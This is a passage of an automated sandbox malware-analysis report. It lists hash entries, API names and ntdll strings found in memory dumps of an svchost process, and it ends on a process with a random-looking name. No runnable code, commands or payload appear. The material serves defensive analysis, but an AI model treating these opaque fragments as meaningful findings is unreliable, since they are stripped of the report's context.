                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c50dc4f1eca9a7bf38fba437ea7005dd29ae283e7b731c70651e9f6a958f4828
                                                                                                                      • Instruction ID: e1642e7ff1da1cd69c9bc8e63f981f7ceb497a26e99b633d4ca2320c79657d2a
                                                                                                                      • Opcode Fuzzy Hash: c50dc4f1eca9a7bf38fba437ea7005dd29ae283e7b731c70651e9f6a958f4828
                                                                                                                      • Instruction Fuzzy Hash: 6D90023521150C42D100B25C4484B86000687E0301F95C016A0124A58D8719C9517521
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b774feb7552b0b072025c6f3e8a385cc4f9a36986d3e9baccf73561a08f35309
                                                                                                                      • Instruction ID: a482f0dfe9d7f362244ffa314bc6d12d10b0572fbb586c0f4d59adc17389ad97
                                                                                                                      • Opcode Fuzzy Hash: b774feb7552b0b072025c6f3e8a385cc4f9a36986d3e9baccf73561a08f35309
                                                                                                                      • Instruction Fuzzy Hash: 2090023521150802D100B69C5488686000687E0301F95D011A5024959EC76989916131
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bdbc6632b6d2436059f58f39b53713e6b7cdf81867513d25cd670efe77ebfd68
                                                                                                                      • Instruction ID: 3417578d4634f509abce4bec0283b6f359588a98ad69e2b2c0dc237381315461
                                                                                                                      • Opcode Fuzzy Hash: bdbc6632b6d2436059f58f39b53713e6b7cdf81867513d25cd670efe77ebfd68
                                                                                                                      • Instruction Fuzzy Hash: 9090023521150803D100B25C5588747000687D0301F95D411A042495CDD75A89516121
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9745820f4d1af29f2a926b5705e0b38584bc73c5979ab795407e7f9a110cd62e
                                                                                                                      • Instruction ID: 2edcd42a9d33859e667726c679f0cf90a438294e0a2a2d547ede2d87eff31169
                                                                                                                      • Opcode Fuzzy Hash: 9745820f4d1af29f2a926b5705e0b38584bc73c5979ab795407e7f9a110cd62e
                                                                                                                      • Instruction Fuzzy Hash: 9390022561550802D140B25C5498746001687D0301F95D011A0024958DC75D8B5566A1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                      • Instruction ID: c5e339056cf84fcb418ac2a17471c49a8d15cf03a4bc521d87aa7124c24fb37f
                                                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                      • Opcode ID: ce988888a268b14dd04c2eed85da2b5b366b868ba12eb108fc93aeff074d0c1c
                                                                                                                      • Instruction ID: 01a02ea5670d7c8590c05c56ab31527f458cd3ad3d67d14d3859eaba1d90497a
                                                                                                                      • Opcode Fuzzy Hash: ce988888a268b14dd04c2eed85da2b5b366b868ba12eb108fc93aeff074d0c1c
                                                                                                                      • Instruction Fuzzy Hash: 7051C6B6A04616BFCB20DB9C8CD097FF7BCFB09201B188569E4A5D7641D238DE54CBA0
                                                                                                                      Strings
                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 033A4655
                                                                                                                      • Execute=1, xrefs: 033A4713
                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 033A46FC
                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 033A4725
                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 033A4787
                                                                                                                      • ExecuteOptions, xrefs: 033A46A0
                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 033A4742
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                      • API String ID: 0-484625025
                                                                                                                      • Opcode ID: e009565eb17cf7e0d5f3d495fe25a5838c887fc53bf855ec9a4b625f41186788
                                                                                                                      • Instruction ID: ce14d0e14ea01b27c8ab75d0c4535213292f1beb53462244d55ac030f39fabca
                                                                                                                      • Opcode Fuzzy Hash: e009565eb17cf7e0d5f3d495fe25a5838c887fc53bf855ec9a4b625f41186788
                                                                                                                      • Instruction Fuzzy Hash: 38510635A003196EDB24EBA9DCC5FFE77BCEF05308F4440A9E605AB291E7719A418B50
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-$0$0
                                                                                                                      • API String ID: 1302938615-699404926
                                                                                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                      • Instruction ID: 8bcfd3f51f991cd356edf5280008a103a60722e9b52c59641f6da1e6b93e04e0
                                                                                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                      • Instruction Fuzzy Hash: B5819074E05289AEDF34CE68C8D17FEFBB5AF45360F1C4259E861AB390C73899408B64
                                                                                                                      Strings
                                                                                                                      • RTL: Re-Waiting, xrefs: 033A031E
                                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033A02BD
                                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033A02E7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                      • API String ID: 0-2474120054
                                                                                                                      • Opcode ID: 96a16868dc427f3a065347153c68b3478d754fc0e040704174501d28fa99e35b
                                                                                                                      • Instruction ID: 437e2469649998cca6c8fa11ec96c069577005ed4a89f73e452acc863c8f3f77
                                                                                                                      • Opcode Fuzzy Hash: 96a16868dc427f3a065347153c68b3478d754fc0e040704174501d28fa99e35b
                                                                                                                      • Instruction Fuzzy Hash: E8E19C34604B41DFD728CF28C8C4B6AB7E4FB88314F184A69F9A58B6E1D774D945CB42
                                                                                                                      Strings
                                                                                                                      • RTL: Re-Waiting, xrefs: 033A7BAC
                                                                                                                      • RTL: Resource at %p, xrefs: 033A7B8E
                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 033A7B7F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 0-871070163
                                                                                                                      • Opcode ID: 778f3610cc060eccc8c9b23e3f192b4477a872bb81f3dde8e82e9c2445b6bc7d
                                                                                                                      • Instruction ID: 7d52cc9a83c15f7016bc0cbcfe147df8626b1fa6f84c5230747718fbedae6495
                                                                                                                      • Opcode Fuzzy Hash: 778f3610cc060eccc8c9b23e3f192b4477a872bb81f3dde8e82e9c2445b6bc7d
                                                                                                                      • Instruction Fuzzy Hash: 3D419D357017029FC724DA6ACCC0B6AF7E9EB88710F144A2DE95ADF690DB71E8058F91
                                                                                                                      APIs
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 033A728C
                                                                                                                      Strings
                                                                                                                      • RTL: Re-Waiting, xrefs: 033A72C1
                                                                                                                      • RTL: Resource at %p, xrefs: 033A72A3
                                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 033A7294
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 885266447-605551621
                                                                                                                      • Opcode ID: 682e6953a81da2a4605136670f444597cd0ee6ffd89782d769c6e6ade0a1cdb8
                                                                                                                      • Instruction ID: d34ebea0a057e4bc556911e11a4a49b00947e690c439a05b0e144202ace073ce
                                                                                                                      • Opcode Fuzzy Hash: 682e6953a81da2a4605136670f444597cd0ee6ffd89782d769c6e6ade0a1cdb8
                                                                                                                      • Instruction Fuzzy Hash: 5641FF35B00B06AFC721DE69CCC1B6AF7A9FF84710F144629F995EB640DB21E8528BD1
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-
                                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                      • Instruction ID: 1188f55f68dda7790c844437d2a5ac53c625de06af632b470c95c1bf52cf1a6b
                                                                                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                      • Instruction Fuzzy Hash: 1991B270E0021A9BDB34DF69CDC5ABEB7A5EF44320F18461AE865EB6D0D73C9942CB50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$@
                                                                                                                      • API String ID: 0-1194432280
                                                                                                                      • Opcode ID: 3b5e93385d0931a11f200563d9383557f7ba7e5ae91807c694ff7a3b18fa2e13
                                                                                                                      • Instruction ID: 23aeeb79664e049d612244274ce86437f384dfee2462f3e96e639fcc59e62424
                                                                                                                      • Opcode Fuzzy Hash: 3b5e93385d0931a11f200563d9383557f7ba7e5ae91807c694ff7a3b18fa2e13
                                                                                                                      • Instruction Fuzzy Hash: 55811976D01669DBDB31DF54CC84BEAB7B8AB08710F0445EAA919B7680D7709E84CFA0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_38a0000_fWXPcgRbOhi.jbxd